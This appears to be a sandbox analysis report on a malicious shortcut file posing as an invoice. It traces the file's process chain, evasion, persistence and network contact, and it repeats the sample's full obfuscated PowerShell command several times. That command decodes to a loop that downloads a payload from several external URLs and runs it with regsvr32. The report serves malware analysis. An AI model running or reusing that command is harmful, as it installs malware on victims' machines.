                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                    Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"
                    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220523
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvcdsjdc.j3a.ps1
                    Source: classification engine Classification label: mal100.troj.evad.winLNK@14/8@2/4
                    Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW, 4_2_0000000180006F2C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D15D push ebx; retn 0068h 3_2_000000018000D15E
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                    Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA524712E3 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_00007FFA524712E3
                    Source: IKdzfJtQpj.BCP.2.dr Static PE information: real checksum: 0x654f5 should be: 0x60ea5
                    Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"

                    Persistence and Installation Behavior

                    Source: LNK file Process created: C:\Windows\System32\cmd.exe
                    Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
                    Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\ZrCipB\RLcE.dll (copy)

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\ZrCipB\RLcE.dll:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784 Thread sleep count: 5759 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5488 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1784 Thread sleep count: 399 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 1124 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5588 Thread sleep time: -90000s >= -30000s
                    Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-16419
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5759
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 399
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Windows\System32\regsvr32.exe API coverage: 9.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                    Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-16420
                    Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-16545
                    Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
                    Source: svchost.exe, 00000008.00000002.704435082.000001F192629000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`b
                    Source: svchost.exe, 00000008.00000002.705525389.000001F197E63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
                    Source: powershell.exe, 00000002.00000002.481251054.000001AFF9302000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704382465.000000000060D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527977239.000000000060D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.705504189.000001F197E56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704616242.0000027EE36EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704468644.0000027EE3678000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000A.00000002.704277913.0000022C9BE02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: svchost.exe, 0000000A.00000002.704435462.0000022C9BE28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA52463280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA52463280
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA52470215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_00007FFA52470215
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA524712E3 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00007FFA524712E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA5246BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFA5246BE50

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.82.82.196 8080
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP

                    Language, Device and Operating System Detection

                    Source: Yara match File source: RechnungsDetails 2022.20.05_1044.lnk, type: SAMPLE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA52468900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00007FFA52468900
                    Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA52468860 HeapCreate,GetVersion,HeapSetInformation,3_2_00007FFA52468860

                    Stealing of Sensitive Information

                    Source: Yara match File source: 3.2.regsvr32.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.regsvr32.exe.1e40000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.regsvr32.exe.1e40000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.regsvr32.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000004.00000002.704622582.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.705071656.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.476121301.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 12 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | 21 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 111 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 25 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 31 Masquerading | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 22 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | 111 Process Injection | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Regsvr32 | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
